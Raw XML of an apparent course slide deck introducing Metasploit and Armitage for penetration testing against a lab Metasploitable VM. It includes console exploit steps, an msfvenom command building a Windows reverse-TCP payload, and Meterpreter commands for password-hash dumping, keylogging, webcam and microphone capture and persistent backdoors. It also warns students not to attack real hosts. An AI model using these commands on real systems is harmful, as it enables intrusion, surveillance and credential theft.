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1" r:id="rId3"/>
    <p:sldId id="292" r:id="rId4"/>
    <p:sldId id="282" r:id="rId5"/>
    <p:sldId id="278" r:id="rId6"/>
    <p:sldId id="279" r:id="rId7"/>
    <p:sldId id="280" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="286" r:id="rId10"/>
    <p:sldId id="281" r:id="rId11"/>
    <p:sldId id="283" r:id="rId12"/>
    <p:sldId id="297" r:id="rId13"/>
    <p:sldId id="298" r:id="rId14"/>
    <p:sldId id="258" r:id="rId15"/>
    <p:sldId id="262" r:id="rId16"/>
    <p:sldId id="260" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="263" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="271" r:id="rId22"/>
    <p:sldId id="264" r:id="rId23"/>
    <p:sldId id="265" r:id="rId24"/>
    <p:sldId id="266" r:id="rId25"/>
    <p:sldId id="273" r:id="rId26"/>
    <p:sldId id="267" r:id="rId27"/>
    <p:sldId id="268" r:id="rId28"/>
    <p:sldId id="301" r:id="rId29"/>
    <p:sldId id="303" r:id="rId30"/>
    <p:sldId id="269" r:id="rId31"/>
    <p:sldId id="270" r:id="rId32"/>
    <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="304" r:id="rId34"/>
    <p:sldId id="305" r:id="rId35"/>
    <p:sldId id="306" r:id="rId36"/>
    <p:sldId id="307" r:id="rId37"/>
    <p:sldId id="308" r:id="rId38"/>
    <p:sldId id="299" r:id="rId39"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="296" r:id="rId41"/>
    <p:sldId id="293" r:id="rId42"/>
    <p:sldId id="302" r:id="rId43"/>
    <p:sldId id="300" r:id="rId44"/>
    <p:sldId id="288" r:id="rId45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FF9966"/>
    <a:srgbClr val="33CCFF"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="FF0066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82016" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="23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armitage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find attack stuck issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://github.com/rsmudge/armitage/issues/229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cd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/share/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metasploit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-framework/modules/exploits/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linux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misc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sudo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mv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saltstack_salt_unauth_rce.rb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saltstack_salt_unauth_rce.rb.bkp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set from menu [ Armitage set Exploit Rank poor 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https://stackoverflow.com/questions/65941317/metasploit-crashed-after-upgrade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Metasploit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requires the Bundler gem to be installed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https://github.com/rapid7/metasploit-framework/issues/11597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Go to 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usr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/share/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metasploit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-frame and write 'gem install bundler' then 'bundle install' then 'gem update --system' and it will work.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2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Meterpreter is deployed using in-memory DLL injection. As a result, Meterpreter resides entirely in memory and writes nothing to disk.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29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msf6 exploit(multi/handler) show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1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33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727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5709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3132389"/>
            <a:ext cx="8229600" cy="301376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0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8" r:id="rId3"/>
    <p:sldLayoutId id="214748389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sive-security.com/metasploit-unleashed/armitage/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tutorialspoint.com/metasploit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ources.infosecinstitute.com/topic/how-to-attack-windows-10-machine-with-metasploit-on-kali-linux/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jamiepegg.medium.com/spy-on-windows-machines-using-metasploit-758dbf72bb90" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.fastandeasyhacking.com/manua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rmation.rapid7.com/download-metasploitable-2017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nitesculucian.github.io/2018/07/24/msfvenom-cheat-shee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amiepegg.medium.com/spy-on-windows-machines-using-metasploit-758dbf72bb9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ffensive-security.com/metasploit-unleashed/screen-cap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ensive-security.com/metasploit-unleashed/keylogging/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/privilege-escal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ffensive-security.com/metasploit-unleashed/meterpreter-basics/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/searching-content/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash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Introduction to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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Fu,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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Side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 is tricked to run your payload launched from the link and document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>side attacks require user-interaction such as enticing them to click a link, open a document, or somehow get to your malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The malware runs on the target computer, not deployed from a remote computer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45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cyber attack cycle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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and Armitage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16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penetration testing to find security vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used through command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>prompt or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web UI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Available within Kali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98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/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> tutorial</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> unleashed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Tutorial on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>armitage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Armitage is a GUI front end of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit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Armitage fast and easy hacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Spy On Windows Machines Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>How to attack Windows 10 machine with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> on Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Linux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66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950" y="1405285"/>
            <a:ext cx="4804500" cy="47034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Start </a:t>
            </a:r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Kali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84787"/>
            <a:ext cx="3743326" cy="43159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 smtClean="0"/>
              <a:t>Metasploit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Applications </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>→Exploitation Tools </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> framework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Armitage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Applications </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>→Exploitation Tools </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Armitage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Sometimes, if Armitage cannot start, start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> first, close it and then start Armitage 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743200" y="1600200"/>
            <a:ext cx="1457325" cy="471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5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Armitage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GUI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>front-end for the </a:t>
            </a:r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What you do in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will be translated into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Armitage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Applications -Exploitation Tools -Armitage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Attack steps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Scanning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Exploitation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Post exploitation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41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Vulnerable </a:t>
            </a:r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Vulnerable computers on the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not try!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You instructor will not take any responsibility!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>virtual machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A lot of vulnerabilities for exercise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://information.rapid7.com/download-metasploitable-2017.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfadmin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Default password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfadmin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27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Armitage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1492430"/>
            <a:ext cx="6386512" cy="48497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1612" y="3157537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Modules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24574" y="2362406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Targets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21827" y="4522860"/>
            <a:ext cx="1316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Console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58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1. Armitage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Hosts -MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scans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Enter scan range: 10.0.2.0/25 or 10.0.2.1-254</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Scan-&gt;Intense Scan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62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2. Armitage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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>host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Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the exploit in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tree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Learning which exploits to use and when comes with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>experience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Double-click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on it to bring up the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>configuration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Launch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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>game: Denial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoS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cyber attack cycle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metasploit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Armitage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3. Armitage Post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Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the post exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>module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Double-clicking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on ‘Launch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’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Kiddy Use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Armitage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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="91440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Quit it after it starts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 err="1" smtClean="0"/>
              <a:t>armitage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1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Scan a local area network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Hosts-&gt;MSF Scans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Identify OS of target IP/Computer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Hosts -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> Scan -Quick Scan (OS detect)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Find attacks (wait to finish)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C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Armitage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Exploit Rank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Poor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>: run all available attacks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i="1" dirty="0" smtClean="0"/>
              <a:t>Attacks -Find Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: match found services with exploit database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Attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>-Hail Mary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: deploy found exploits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98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using Command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Start the console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msfconsole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Show and select exploits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show exploits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Use an exploit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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“exploit path” </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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Set options of the exploit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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> show options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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> set payload “particular-payload”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msf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RHOST 192.168.1.101   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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RPORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>21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Start the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> run or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> exploit </a:t>
            </a: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00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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scans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Armitage can launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scans and import the results into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit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/>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scans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Armitage bundles several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scans into one feature called MSF Scans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Payload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scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that the hackers utilize to interact with a hacked system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Exploit rank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How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reliable the exploit is and how likely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to cause negative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>impact on the target system.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87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Once getting into a computer, collect sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>information such as usernames and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>passwords for the purpose of auditing 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To analyze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>systems use strong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>passwords or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meterpreter is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack payload that provides an interactive shell to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacker exploring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the target machine and execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code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Within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter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hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>all the usernames and the </a:t>
            </a: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msfvenom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msfvenom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 err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> standalone payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Cheat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates a simple TCP Payload for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>example.exe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8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attacker enumerates all possible passwords automatically to guess the password and gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>access over a host or a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>service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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ime consuming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Dictionary attack will help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Potential services for brute-force attacks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FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, SSH,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 smtClean="0"/>
              <a:t>http,Telnet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60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If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>we don’t maintain access, then we will have to try to exploit it from the beginning in case the hacked system is closed or patched.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best way is to install a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>backdoor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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can plant backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a special payload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It allows you to interact with the target computer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So it can plant persistent backdoors so that even if the system restarts, we can still get in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5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Meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>commands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help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getuid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/>
              <a:t>getsystem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/>
              <a:t>webcam_list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webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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webcam_stream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/>
              <a:t>record_mic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screenshot</a:t>
            </a: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keyscan_start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keyscan_dump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keyscan_stop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shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installing Persistence And Opening A Backdoor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4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Screen Capture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migrate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  # explorer.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>espia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>screengrab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9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9440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Can you crash the chat server somehow with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
